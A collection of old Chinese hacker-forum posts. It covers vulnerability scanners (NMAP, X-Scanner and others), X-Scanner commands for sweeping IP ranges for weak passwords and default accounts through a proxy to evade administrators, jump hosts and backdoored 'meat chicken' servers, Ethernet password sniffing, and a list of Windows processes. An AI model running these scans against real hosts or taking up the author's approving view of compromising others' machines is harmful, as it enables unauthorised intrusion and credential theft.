“比起你用过的流光来说，ISS算得上是一个真正的管理员使用的系统扫描工具，首先它能扫描一些众所周知的系统漏洞和系统弱点，包括一些往往被用户忽略的问题，这些问题是一些经常被黑客利用的漏洞和弱点。ISS有更为强大的漏洞分析功能，并且它不会允许非法访问，但是实际情况是ISS已经背离了它的初衷目的。” <BR><BR>　　“任何好的事物都有不利的一面，更何况一把刀，而且是把宝刀。” <BR><BR>　　“这话不错，ISS的确是安全界最为出色的扫描器，而且他还是第一个可以公开得到的多层次扫描器。特别是它的可移植性和灵活性，众多的UNIX的平台上都可以运行ISS，ISS的扫描时间和效率也是很快的，很适合于企业级的用户。” <BR>“前辈，我插一句话，虽然ISS足够强大，但是它毕竟不是免费的午餐，这就不符合我们的黑客精神了。您那里有没有一些强大而且免费的扫描器？” <BR><BR>　　“扫描器庞大的家族中怎么会没有免费的，你听说过NMAP吗？” <BR><BR>　　“NMAP倒是有所耳闻，以前在许多安全网站上见到过这个名字，但是我不知道它是干什么用的一个东西。” <BR><BR>　　“NMAP其实就是一个功能强大的扫描器。它的强大之处在于它支持UDP，TCP (connect)，TCP SYN(half open)，ftp proxy(bounce attack)，Reverse-ident，ICMP(ping sweep)，FIN，ACK sweep，Xmas Tree，SYN sweep，Null等多种扫描协议和扫描方式。但是总的来说它的最大的优点莫过于隐蔽性高，这是由于它采用的是“半开”的一种扫描方式，此外它提供的Stealth FIN，Xmas Tree与Null扫描模式更是让被扫描者难以发现。也正是因为这一点的原因，NMAP深受一些骨灰级黑客的喜爱。像一般黑客喜欢的秘密扫描、动态延迟、重发与平行扫描、欺骗扫描、端口过滤探测、RPC直接扫描、分布扫描等，NMAP均可以实现，可以说NMAP是一个灵活性很大的扫描器。通过强大系统的扫描，它还可以分析出服务器的端口处于Open状态还是被防火墙保护状态。总之它的强大是不言而喻的，如果你有一台联网的Linux或者UNIX计算机，那么你就可以去<A href="http://www.insecure.org/nmap/" target=_blank><FONT color=#2f5fa1>http://www.insecure.org/nmap/</FONT></A> 下载得到它。</DIV>

<DIV class=tpc_content id=read_499>黑客常用兵器之扫描篇（下）<BR><BR><BR>　　“前辈，我的系统使用的是Windows，您能不能介绍一些我这种菜鸟级黑客也能用的扫描器？当然前提是在Windows系统下运行啊。” <BR><BR>　　“既然这样，我想Cerberus Internet Scanner(CIS)可能比较合适与你，它主要运行在Windows NT和Windows2000的平台下面，当然它也主要是针对微软的Windows操作系统进行探测扫描的。CIS拥有绝大多数菜鸟喜欢的Windows友好界面，而且它提供进行扫描的安全问题也是通常在Windows中经常见到的，其中包括： <BR>　　（1） WWW服务 <BR>　　（2） FTP服务 <BR>　　（3） MS SQL Server 数据库扫描 <BR>　　（4） NetBIOS 共享扫描 <BR>　　（5） 注册表设置 <BR>　　（6） NT服务漏洞 <BR>　　（7） SMTP服务扫描 <BR>　　（8） POP3服务扫描 <BR>　　（9） RPC服务扫描 <BR>　　（10） 端口映射 <BR>　　（11） Finger服务 <BR>　　（12） DNS安全扫描 <BR>　　（13） 浏览器安全等 <BR><BR><BR><BR>　　在CIS中，它最为引人注目的还要数NetBIOS共享扫描。CIS能根据NetBIOS这一漏洞作出NETBIOS资源信息、共享资源、计算机用户名、工作组和薄弱的用户口令等详细的扫描分析。它的操作方法也是非常的容易，你只需要输入目标服务器的地址，然后选择你想要扫描的相关漏洞就可以进行扫描分析了。扫描完毕后他会主动生成一个HTML的报告共你分析结果。你可以在<A href="http://www.cerberus-infosec.co.uk/" target=_blank><FONT color=#2f5fa1>http://www.cerberus-infosec.co.uk/</FONT></A> 下载获得。” <BR><BR>“这款扫描器的功能是否太过于简单了哪？我感觉它比起前几个您说的那些扫描器，功能过于少了，而且没有流光那么有成效。” <BR><BR><BR>　　“SATAN作为扫描器的鼻祖可能很适合你，由于它采用的是一个Perl的内核，通过PERL调用大量的C语言的检测工具对目标网站进行分析，所以你打开浏览器用IE方式就可以直接操作，使用也相对简单，我就不在这里介绍他浪费时间了。 <BR><BR>　　作为黑客的利刃，国产的CGI &amp; Web Scanner也是一个不错的扫描器，这个宝刀是由zer9设计完成打造的。这款扫描器主要是针对动态网站技术的安全问题来设计的。” <BR><BR>　　“动态网站？” <BR><BR>　　“对，动态网站。随着网站设计的日趋复杂化，网站的技术人员会利用一些诸如CGI、ASP、PHP、jsP等网站动态交互技术与相应的服务软件对网站进行开发，这些东西大大地减轻了网站的维护和更新工作量，但是也正是这些技术，导致了大量的安全问题，特别是很多网站动态第三方程序在设计之初根本就没有对安全问题考虑太多，导致了大量的系统漏洞的出现。而CGI &amp; Web Scanner就是专门针对这些动态的网页上出现的漏洞进行扫描的一把利刃。 <BR><BR>　　CGI &amp; Web Scanner的主要功能有： <BR>　　（1） 检测203个已知的CGI漏洞 <BR>　　（2） 通过HTTPD辨认服务器类型 <BR>　　（3） 有更新漏洞的功能 <BR>　　（4） Microsoft SQL Server DOS检测 <BR>　　（5） Httpd Overflow检测 <BR>　　（6） IIS Hack检测 <BR>　　（7） ASP检测 <BR>　　（8） DOT 漏洞检测 <BR><BR>　　而且它可以多线程扫描，并对常见的D.O.S（拒绝服务攻击）和Overflow等也进行探测，很适合初级杀手作为武器。至于你关心的使用方法，就更为简单了，输入目标服务器的IP地址，选择需要扫描的漏洞种类点击扫描按键，就开始了。” <BR><BR><BR>　　“没有想到国产扫描器还有如此优秀的！” <BR><BR>　　“这个是自然，作为黑客的必备武器之一，国产扫描器有很多优秀的作品，前面我提到的安全焦点的X-Scanner，就是我最为欣赏的扫描器，而且我老人家也时常常的使用，但是不知道为什么，在对X-Scanner进行病毒测试的时候，熊猫和KV3000都能在X-Scanner里面发现两个木马程序。这一点是我们要非常的注意的。当然也要请安全焦点的朋友做做解释工作。” <BR><BR>　　“前辈既然如此欣赏X-Scanner，那就给我详细介绍一下吧！” <BR><BR><BR><BR>　　“X-Scanner运行在Windows平台下，它主要针对WindowsNT/Windows 2000操作系统的安全进行全面细致评估，可以扫描出很多Windows系统流行的漏洞，并详细的指出安全的脆弱环节与弥补措施。X-Scanner采用多线程方式对指定IP地址段(或单机)进行安全漏洞扫描，支持插件功能，提供了图形界面和命令行两种操作方式。 <BR>　扫描范围包括： <BR>　　（1）标准端口状态及端口banner信息； <BR>　　（2）CGI漏洞； <BR>　　（3）RPC漏洞； <BR>　　（4）SQL-SERVER默认帐户； <BR>　　（5）FTP弱口令； <BR>　　（6）NT主机共享信息； <BR>　　（7）用户信息； <BR>　　（8）组信息； <BR>　　（9）NT主机弱口令用户等。 <BR><BR>　　X-Scanner会将扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。并对于一些已知漏洞，X-Scanner给出了相应的漏洞描述，利用程序及解决方案。X-Scanner扫描的内容是绝大多数的服务器容易出现的漏洞和安全设置问题。最常用的还是其中的SQL默认帐户、FTP弱口令和共享扫描，他们能揭示出许多麻痹大意的网管犯的一些低级错误。” <BR><BR><BR>　　“前辈能不能具体说说X-Scanner如何使用呢？” <BR><BR>　　“打开了X-Scanner，在扫描项目中可以任意的指定单独扫描哪一个特定的项目。比较多的是CGI和SQL或者FTP默认口令，这些都是很致命的服务器漏洞。” <BR><BR><BR><BR>　　“下一步需要在〖扫描设置〗中进行参数的设置。一般的情况下，只对〖运行参数〗中的扫描范围进行设置。在那里只要填写网站服务器的IP地址就可以，可以填写一个来针对某一个特定的网站或服务器，也可以填写一个IP段范围，来扫描一段IP地址上所有的计算机。具体扫描参数格式如下： <BR><BR>　　1.命令行：Xscan -h [起始地址]&lt;-[终止地址]&gt; [扫描选项] <BR><BR>　　 其中的[扫描选项]含义如下： <BR>　　 -p: 扫描标准端口(端口列表可通过\dat\config.ini文件定制)； <BR>　　 -b: 获取开放端口的banner信息，需要与-p参数合用； <BR>　　 -c: 扫描CGI漏洞； <BR>　　 -r: 扫描RPC漏洞； <BR>　　 -s: 扫描SQL-SERVER默认帐户； <BR>　　 -f: 尝试FTP默认用户登录(用户名及口令可以通过\dat\config.ini文件定制)； <BR>　　 -n: 获取NetBios信息(若远程主机操作系统为Windows9x/NT4.0/2000)； <BR>　　 -g: 尝试弱口令用户连接(若远程主机操作系统为Windows NT4.0/2000)； <BR>　　 -a: 扫描以上全部内容； <BR><BR>-x [代理服务器:端口]: 通过代理服务器扫描CGI漏洞； <BR>　　 -t: 设置线程数量，默认为20个线程； <BR>　　 -v: 显示详细扫描进度； <BR>　　 -d: 禁止扫描前PING被扫主机。 <BR><BR>　　2.示例： <BR>　　Xscan -h xxx.xxx.1.1-xxx.xxx.10.255 -a <BR>　　含义：扫描XXX.XXX.1.1-XXX.XXX.10.255网段内主机的所有信息； <BR><BR>　　Xscan -h xxx.xxx.1.1 -n -g -t 30 <BR>　　含义：获取XXX.XXX.1.1主机的Netbios信息，并检测NT弱口令用户，线程数量为30； <BR><BR>　　Xscan -h xxx.xxx.1.1 -p -b -c -x 129.66.58.13:80 -v -d <BR>　　含义：扫描xxx.xxx.1.1主机的标准端口状态，通过代理服务器"129.66.58.13:80"扫描CGI漏洞，检测端口banner信息，且扫描前不通过PING命令检测主机状态，显示详细扫描进度。” <BR><BR><BR><BR>　　“在〖运行参数〗中，有很大的选择余地，比如它可以设置代理服务器来躲避网管的追查，并课以设置扫描的线程。对扫描显示也可以进行详细的选择。然后扫描器就开始工作了。” <BR><BR>　　“好啊，我去试试。” <BR><BR>　　“另外我要提醒你注意的是，在使用这些扫描软件的时候一定要看清楚里面有没有可以的程序，以防自己先中了别人的招。此外，虽然你刺客手中有刀，但是现在的网站管理员也会使用这些宝刀，所以说，手中有绝世好刀，不一定就能杀死所有的敌人。好了，你去吧！”</DIV>

<DIV class=tpc_content id=read_500>代理、肉鸡、跳板的概念<BR><BR>看到有的网友还用那种8080、80端口的代理，我有话说，也可以说为大家做一点最最基础的黑客教程，大家看完自己去做吧，具体怎么做，我就不说了，可以说我把我所知道的肉鸡和跳板的概念知识全部告诉大家了，我也在几个地方发表过，这是我的原创，我要告诉大家的是真正在黑客抢劫服务器是用的跳板是什么，以及黑客们很少说的跳板知识介绍~~~~~~~~~~我有个习惯，<BR>总是喜欢让大家看一篇文章的时候知道：为 什么要看这篇文章？这篇文章要让<BR>自己知道或是学到什么东西，我尽量把自己所 掌握的东西尽量简化后用通俗的<BR>语言表达。大家看完后有什么不好的地方，请指出，我好学习到新的东西，我很高兴自己能<BR>把自己所学到的东西和大家分享，在 这里的认识的网友们有想成为黑客的；有<BR>想随便玩玩；有的想学，但是不久就感<BR>觉学网络安全很难就退却了。我真的很希望大家能找到自己的目标，做自己喜欢<BR>的事情，不要一天就黑小企鹅和一天泡在别人的软件里（至少要尝试读一些简单的<BR><BR>代码），学习黑客知识是孤独的，必须完全靠自己的努力，很少有人能帮你的，<BR><BR>开始你会觉得很无助，但是慢慢的，你将习惯这种感觉和方式，要自己努力才会<BR><BR>有成果的，我和大家一样也在不停的探索网络知识，现在不过是把自己学到的东<BR><BR>西和大家分享罢了。是不是我象大姨妈啊！！呵呵~~~婆婆***！我看到很<BR>多的网友聊代理的时候，概念很模糊，甚至搞出了笑话，所以今天我就谈谈很多<BR>朋友初涉网安的一个<BR><BR>误区（认识代理、跳板、肉鸡）。有的网友说那还不简单，找个运行就能隐藏IP<BR><BR>的软件，我早说过了，我没有见过这种软件或许说根本不存在这种软件（懒惰的<BR><BR>人更勤于此道）再者对抢劫服务器者而言把自己的身家性命放在一个隐藏自己IP的软件<BR><BR>上是很不明智的，要知道抢劫服务器时会尝试很多的连接，在你一不小心的时候你就把<BR><BR>自己卖了（我曾经在一次抢劫服务器完毕后没有用sc32设置好跳板的IE，而是随手在<BR><BR>桌面上双击浏览器去看黑页，结果把自己给卖了，本来没有什么可怕的，但是我<BR><BR>们要养成做任何事都无懈可击的习惯。再者~~~嘘嘘~~还好是RB鬼子的系统<BR><BR>。）所以我根本不相信什么隐藏IP的软件，也许我孤陋寡闻或是真有这样的东西<BR><BR>，但至少我是不会用的，除非有人张罗着把我毙了，那么我可以考虑一下。<BR><BR>我要说此文适合菜鸟阅读，高手止步！！！<BR><BR>我上小企鹅，老有网友问我代理和跳板以及肉鸡是指同一类概念吗？它们怎么样工<BR><BR>作的？<BR><BR>因为在小企鹅上不可能讲很清楚，涉及的东西太多了，因为此文是面向和我一样初<BR><BR><BR>人涉网络网络安全的朋友，那么我就简单的说说。<BR><BR>首先是代理（泛指80；8080；1080端口），很多网友认为用代理猎手设置好<BR><BR>端口之后就可以为自己找个代理在IE、FTP等里面设置后来隐藏IP，这就是肉鸡<BR><BR>或认为这就是跳板，其实不然，为什么呢？就我个人来看这样的代理简直就是垃<BR><BR>圾（有的网友不服气了，等等，我一会告诉你为什么我这么说），1、首先一个<BR><BR>速度比较慢，我用这样的代理用过很多国家，包括国内的，感觉都是其慢，没有<BR><BR>那种快速的感觉；2、不稳定。大家一定都想拥有一个稳定的代理吧~~~呵呵<BR><BR>但是这样的代理通常有原因的，不是服务器自身漏洞就是为了自身利益而增加的<BR><BR>服务，当他的愿望达成以后或是网管发现以后，你就不能再用了。3、多人使用。如果你<BR><BR>用8080、1080、80等端口的代理，我敢保证这个代理不止你一个人用，如果<BR><BR>你想成为一个黑客或是老手的话，拥有一个自己的代理是必须的。4、保密性。<BR><BR>有的代理服务器提供者很可恶，他们利用代理得知你的密码或一些敏感信息，因<BR><BR>为普通代理数据没有经过加密（1080端口除外），用一个嗅探器就可以知道你<BR><BR>输入的数据，别忘了代理的最最基本原理是数据转发哟。好了，有了以上的缺点<BR><BR>你还敢用或是有信心用它吗？这就是我为什么叫它垃圾的原因了。有网友会问：<BR><BR>那什么样的代理才没有这些缺点呢？别急，我下面就要说。<BR><BR>socks5.这是一个很不错的跳板软件，很小（32K）功能却是不凡，它是sock4<BR><BR>的接替者，原来的sock4只支持UDP协议（这个大家去看书吧，我不多说了），<BR><BR>而sock5支持USP和TCP两种协议，还有数据的传输是加密的所以真的很佩服作者的编程能力。如果你简<BR><BR>单的使用它，那你上个小企鹅啊或IRC啦，那是没有什么问题啦，而且它的速度很快<BR><BR>几乎和你使用本地机没有什么差别（当然不能加太多跳板），sock5支持你搭建<BR><BR>255个跳板，也就是你可以用skserverGUI来编辑多达255个安装了sock5的机<BR><BR>器来运行达到你隐藏IP的目的，但我想如果我看见有人这样做的话，我会马上打<BR><BR>电话到精神病院~~~：）而且用sc32来配合skserverGUI的话，那么你的电脑<BR><BR>几乎就没有应用程序不能用代理的。你用过之后一定会说：我喜欢！我选择！sock5的安装也很简单，在此软件的说明书里有，因为我主要是让大家了解代理------&amp;g*;跳板------&amp;g*;肉鸡的简单原理；再者因为制作这样的跳板或肉鸡很有攻击性（会构成非法使用<BR><BR>他人电脑），而且网上有很多人不自觉，我可不想以后有人被抓了，说我<BR><BR>曾经为他的犯罪生涯做过贡献。<BR><BR>好了！最后我们来说说肉鸡吧<BR><BR>肉鸡是什么？在小企鹅上也有朋友问我，我认为这是中国黑客对自己开了后门的服<BR><BR>务器为将来自己做一些事时使用的机器的一种自豪而又亲切的叫法.肉鸡是老手<BR><BR>常用的代理，也就是*elne*的那种，完全是靠自己制作的，端口加密码啦！绝对<BR><BR>只有你一个人用，当然被别人提前下手的话，那你就清除它的后门就可以了，当<BR><BR>你第一次拥有这种服务器的时候你的心情是什么样的？我个人感觉是象初恋一样<BR><BR>。<BR><BR>有3389肉鸡通常可以图形化*作，从而发动拒绝服务攻击，那么我们用什么样<BR>系统的肉鸡呢？~~~~恩！marke这个<BR><BR>问题问的很好~~：）<BR><BR>我喜欢用windows 2000和linux，虽然我一直采用WIN 2000但是告诉大家一个<BR><BR>好消息我刚刚拥有了自己第一台LINUX肉鸡，对我这个正在学习LINUX的家伙来<BR><BR>说，没事到上面熟悉一下LINUX指令是件很愉快的事。要想学用这种肉鸡必须熟<BR><BR>练DOS指令（指windows)，因为没有图形界面让你玩的。做一个黑客必须适应字符化的*作<BR>当你*elne*到一台你服务器里（肉鸡）<BR><BR><BR>你就可以踏雪无痕了，就象“信息公路牛崽”（抢劫服务器五角大楼的美国天才黑客）一<BR><BR>样先连接到RB、到中东、再绕回美国本土抢劫服务器五角大楼，听上去很神秘吧，其<BR><BR>实用的原理就是这个。</DIV>

<DIV class=tpc_content id=read_501>网络监听概念<BR><BR><BR>网络监听工具的提供给管理员的一类管理工具。使用这种工具，可以监视网络的状态、数据流动情况以及网络上传输的信息。 <BR><BR>　　但是网络监听工具也是黑客们常用的工具。当信息以明文的形式在网络上传输时，便可以使用网络监听的方式来进行攻击。将网络接口设置在监听模式，便可以源源不断地将网上传输的信息截获。 <BR><BR>　　网络监听可以在网上的任何一个位置实施，如局域网中的一台主机、网关上或远程网的调制解调器之间等。黑客们用得最多的是截获用户的口令。 <BR><BR>　　什么是网络监听 <BR><BR>　　网络监听是黑客们常用的一种方法。当成功地登录进一台网络上的主机，并取得了这台主机的超级用户的权限之后，往往要扩大战果，尝试登录或者夺取网络中其他主机的控制友。而网络监听则是一种最简单而且最有效的方法，它常常能轻易地获得用其他方法很难获得的信息。 <BR><BR>　　在网络上，监听效果最好的地方是在网关、路由器、防火墙一类的设备处，通常由网络管理员来操作。使用最方便的是在一个以太网中的任何一台上网的主机上，这是大多数黑客的做法。<BR><BR><BR><BR><BR>以太网中可以监听的原因 <BR><BR>　　在电话线路和无线电、微波中监听传输的信息比较好理解，但是人们常常不太理解为什么局域网中可以进行监听。甚至有人问：能不能监听不在同一网段的信息。下面就讲述在以太网中进行监听的一些原理。在令牌环中，道理是相似的。 <BR><BR>　　对于一个施行网络攻击的人来说，能攻破网关、路由器、防火墙的情况极为少见，在这里完全可以由安全管理员安装一些设备，对网络进行监控，或者使用一些专门的设备，运行专门的监听软件，并防止任何非法访关。然而，潜入一台不引人注意的计算机中，悄悄地运行一个监听程序，一个黑客是完全可以做到的。监听是非常消耗CPU资源的，在一个担负繁忙任务的计算机中进行监听，可以立即被管理员发现，因为他发现计算机的响应速度令人惊奇慢。 <BR><BR>　　对于一台连网的计算机，最方便的是在以太网中进行监听，只须安装一个监听软件，然后就可以坐在机器旁浏览监听到的信息了。 <BR><BR>　　以太网协议的工作方式为将要发送的数据包发往连在一起的所有主机。在包头中包含着应该接收数据包的主机的正确地址。因此，只有与数据包中目标地址一致的那台主机才能接收信包。但是，当主机工在监听模式下，无论数据包中的目标物理地址是什么，主机都将接收。 <BR><BR>　　在Internet上，有许多这样的局域网。几台甚至十几台主机通过一条电缆一个集线器连在一起。在协议的高层或用户看来，当同一网络中的两台主机通信时，源主机将写有目的主机IP地址的数据包发向网关。但是，这种数据包并不能在协议栈的高层直接发送出去。要发送的数据包必须从TCP/IP协议的IP层交给网络接口，即数据链路层。 <BR><BR>　　网络接口不能识别IP地址。在网络接口，由IP层来的带有IP地址的数据包又增加了一部分信息：以太帧的帧头。在帖头中，有两个域分别为只有网络接口才能识别的源主机和目的主机的物理地址，这是一个48位的地址。这个48位的地址是与IP地址对应的。也就是说，一个IP地址，必然对应一个物理地址。对于作为网关的主机，由于它连接了多个网络，因此它同时具有多个IP地址，在每个网络中，它都有一个。发向局域网之外的帧中携带的是网关的物理地址。<BR><BR><BR><BR><BR>在以太网中，填写了物理地址的帧从网络接口中，也就是从网卡中发送出去，传送到物理的线路上。如果局域网是由一条粗缆或细缆连接机而成，则数字信号在电缆上传输，信号能够到达线路上的每一台主机。当使用集线器时，发送出去的信号到达集线器，由集线器再发向连接在信线器上的每一条线路。于是，在物理线路上传输的数字信号也能到达连接在集线器上的每一主机。 <BR><BR>　　数字信号到达一台主机的网络接口时，在正常情况下，网络接口读入数据帧，进行检查，如果数据帧中携带的确良物理地址是自己的，或者物理地址是广播地址，则将数据帧交给上层协议软件，也就是IP层软件，否则就将这个帧丢弃。对于每一个到达网络接口的数据帧，都要进行这个过程。然而，当主机工作在监听模式下，则所有的数据帧都将被交给上层协议软件处理。 <BR><BR>　　局域网的这种工作方式，一个形象的例子是，大房间就像是一个共享的信道，里面的每个人好像是一台主机。人们所说的话是信息包，在大房间中到处传播。当我们对其中某个人说话时，所有的人都能听到。但只有名字相同的那个人，才会对这些话语做出反映，进行处理。其余的人听到了这些谈话，只能从发呆中猜测，是否在监听他人的谈话。 <BR><BR>　　当连接在同一条电缆或集线器上的主机被逻辑地分为几个子网时，如果一台主机处于监听模式下，它还能接收到发向与自己不在同一子网(使用了不同的掩码、IP地址和网关)的主机的那些信包。也就是说，在同一条物理信道上传输的所有信息都可以被接收到。 <BR><BR>　　许多人会问：能不能监听不在同一个网段计算机传输的信息。答案是否定的，一台计算机只能监听经过自己网络接口的那些信包。否则，我们将能监听到整个Internet,情形会多么可怕。<BR><BR><BR><BR><BR><BR>目前的绝大多数计算机网络使用共享的通信信道。从上面的讨论中，我们知道，通信信道的共享意味着，计算机有可能接收发向另一台计算机的信息。 <BR><BR>　　另外，要说明的是，Internet中使用的大部分协议都是很早设计的，许多协议的实现都是基于一种非常友好的，通信的双方充分信任的基础之上。因此，直到现在，网络安全还是非常脆弱的。在通常的网络环境下，用户的所有信息，包手户头和口令信息都是以明文的方式在网上传输。因此，对于一个网络黑客和网络攻击者进行网络监听，获得用户的各种信息并不是一件很困难的事。只要具有初步的网络和TCP/IP协议知识，便能轻易地从监听到的信息中提取出感兴趣的部分。 <BR><BR>　　网络监听常常要保存大量的信息，对收集的信息进行大量的整理工作，因此，正在进行监的机器对用户的请求响应很慢。 <BR><BR>　　首先，网络监听软件运行时，需要消耗大量的处理器时间，如果在此时，就详细地分析包中的内容，许多包就会来不信接收而漏掉。因此，网络监听软件通常都是将监听到的包存放在文件中，待以后再分析。 <BR><BR>　　其次，网络中的数据包非常复杂，两台主机之间即使连续发送和接受数据包，在监听到的结果中，中间必然会夹杂了许多别的主机交互的数据包。监听软件将同一TCP会话的包整理到一起，已经是很不错了。如果还希望将用户的详细信息整理出眯，需要根据协议对包进行大量的分析。面对网络上如此众多的协议，这个监听软件将会十分庞大。 <BR><BR>　　其实，找这些信息并不是一件难事。只要根据一定的规律，很容易将有用的信息一一提取出来。</DIV>

<DIV class=tpc_content id=read_502>系统进程信息<BR><BR>[system process] - [system process] - 进程信息<BR>进程文件: [system process] or [system process]<BR>进程名称: Windows内存处理系统进程<BR>描述: Windows页面内存管理进程，拥有0级优先。<BR><BR><BR>alg - alg.exe - 进程信息<BR>进程文件: alg or alg.exe<BR>进程名称: 应用层网关服务<BR>描述: 这是一个应用层网关服务用于网络共享。<BR><BR><BR>csrss - csrss.exe - 进程信息<BR>进程文件: csrss or csrss.exe<BR>进程名称: Client/Server Runtime Server Subsystem<BR>描述: 客户端服务子系统，用以控制Windows图形相关子系统。<BR><BR><BR>ddhelp - ddhelp.exe - 进程信息<BR>进程文件: ddhelp or ddhelp.exe<BR>进程名称: DirectDraw Helper<BR>描述: DirectDraw Helper是DirectX这个用于图形服务的一个组成部分。<BR><BR><BR>dllhost - dllhost.exe - 进程信息<BR>进程文件: dllhost or dllhost.exe<BR>进程名称: DCOM DLL Host进程<BR>描述: DCOM DLL Host进程支持基于COM对象支持DLL以运行Windows程序。<BR><BR><BR>explorer - explorer.exe - 进程信息<BR>进程文件: explorer or explorer.exe<BR>进程名称: 程序管理<BR>描述: Windows Program Manager或者Windows Explorer用于控制Windows图形Shell，包括开始菜单、任务栏，桌面和文件管理。<BR><BR><BR>inetinfo - inetinfo.exe - 进程信息<BR>进程文件: inetinfo or inetinfo.exe<BR>进程名称: IIS Admin Service Helper<BR>描述: InetInfo是Microsoft Internet Infomation Services (IIS)的一部分，用于Debug调试除错。<BR><BR><BR>internat - internat.exe - 进程信息<BR>进程文件: internat or internat.exe<BR>进程名称: Input Locales<BR>描述: 这个输入控制图标用于更改类似国家设置、键盘类型和日期格式。<BR><BR><BR>kernel32 - kernel32.dll - 进程信息<BR>进程文件: kernel32 or kernel32.dll<BR>进程名称: Windows壳进程<BR>描述: Windows壳进程用于管理多线程、内存和资源。<BR><BR><BR>lsass - lsass.exe - 进程信息<BR>进程文件: lsass or lsass.exe<BR>进程名称: 本地安全权限服务<BR>描述: 这个本地安全权限服务控制Windows安全机制。<BR><BR><BR>mdm - mdm.exe - 进程信息<BR>进程文件: mdm or mdm.exe<BR>进程名称: Machine Debug Manager<BR>描述: Debug除错管理用于调试应用程序和Microsoft Office中的Microsoft script Editor脚本编辑器。<BR><BR><BR>mmtask - mmtask.tsk - 进程信息<BR>进程文件: mmtask or mmtask.tsk<BR>进程名称: 多媒体支持进程<BR>描述: 这个Windows多媒体后台程序控制多媒体服务，例如MIDI。<BR><BR><BR>mprexe - mprexe.exe - 进程信息<BR>进程文件: mprexe or mprexe.exe<BR>进程名称: Windows路由进程<BR>描述: Windows路由进程包括向适当的网络部分发出网络请求。<BR><BR><BR>msgsrv32 - msgsrv32.exe - 进程信息<BR>进程文件: msgsrv32 or msgsrv32.exe<BR>进程名称: Windows信使服务<BR>描述: Windows信使服务调用Windows驱动和程序管理在启动。<BR><BR><BR>mstask - mstask.exe - 进程信息<BR>进程文件: mstask or mstask.exe<BR>进程名称: Windows计划任务<BR>描述: Windows计划任务用于设定继承在什么时间或者什么日期备份或者运行。<BR><BR><BR>regsvc - regsvc.exe - 进程信息<BR>进程文件: regsvc or regsvc.exe<BR>进程名称: 远程注册表服务<BR>描述: 远程注册表服务用于访问在远程计算机的注册表。<BR><BR><BR>rpcss - rpcss.exe - 进程信息<BR>进程文件: rpcss or rpcss.exe<BR>进程名称: RPC Portmapper<BR>描述: Windows 的RPC端口映射进程处理RPC调用(远程模块调用)然后把它们映射给指定的服务提供者。<BR><BR><BR>services - services.exe - 进程信息<BR>进程文件: services or services.exe<BR>进程名称: Windows Service Controller<BR>描述: 管理Windows服务。<BR><BR><BR>smss - smss.exe - 进程信息<BR>进程文件: smss or smss.exe<BR>进程名称: Session Manager Subsystem<BR>描述: 该进程为会话管理子系统用以初始化系统变量，MS-DOS驱动名称类似LPT1以及COM，调用Win32壳子系统和运行在Windows登陆过程。<BR><BR><BR>snmp - snmp.exe - 进程信息<BR>进程文件: snmp or snmp.exe<BR>进程名称: Microsoft SNMP Agent<BR>描述: Windows简单的网络协议代理（SNMP）用于监听和发送请求到适当的网络部分。<BR><BR><BR>spool32 - spool32.exe - 进程信息<BR>进程文件: spool32 or spool32.exe<BR>进程名称: Printer Spooler<BR>描述: Windows打印任务控制程序，用以打印机就绪。<BR><BR><BR>spoolsv - spoolsv.exe - 进程信息<BR>进程文件: spoolsv or spoolsv.exe<BR>进程名称: Printer Spooler Service<BR>描述: Windows打印任务控制程序，用以打印机就绪。<BR><BR><BR>stisvc - stisvc.exe - 进程信息<BR>进程文件: stisvc or stisvc.exe<BR>进程名称: Still Image Service<BR>描述: Still Image Service用于控制扫描仪和数码相机连接在Windows。<BR><BR><BR>svchost - svchost.exe - 进程信息<BR>进程文件: svchost or svchost.exe<BR>进程名称: Service Host Process<BR>描述: Service Host Process是一个标准的动态连接库主机处理服务。<BR><BR><BR>system - system - 进程信息<BR>进程文件: system or system<BR>进程名称: Windows System Process<BR>描述: Microsoft Windows系统进程。<BR><BR><BR>taskmon - taskmon.exe - 进程信息<BR>进程文件: taskmon or taskmon.exe<BR>进程名称: Windows Task Optimizer<BR>描述: windows任务优化器监视你使用某个程序的频率，并且通过加载那些经常使用的程序来整理优化硬盘。 <BR><BR><BR>tcpsvcs - tcpsvcs.exe - 进程信息<BR>进程文件: tcpsvcs or tcpsvcs.exe<BR>进程名称: TCP/IP Services<BR>描述: TCP/IP Services Application支持透过TCP/IP连接局域网和Internet。<BR><BR><BR>winlogon - winlogon.exe - 进程信息<BR>进程文件: winlogon or winlogon.exe<BR>进程名称: Windows Logon Process<BR>描述: Windows NT用户登陆程序。<BR><BR><BR>winmgmt - winmgmt.exe - 进程信息<BR>进程文件: winmgmt or winmgmt.exe<BR>进程名称: Windows Management Service<BR>描述: Windows Management Service透过Windows Management Instrumentation data (WMI)技术处理来自应用客户端的请求</DIV>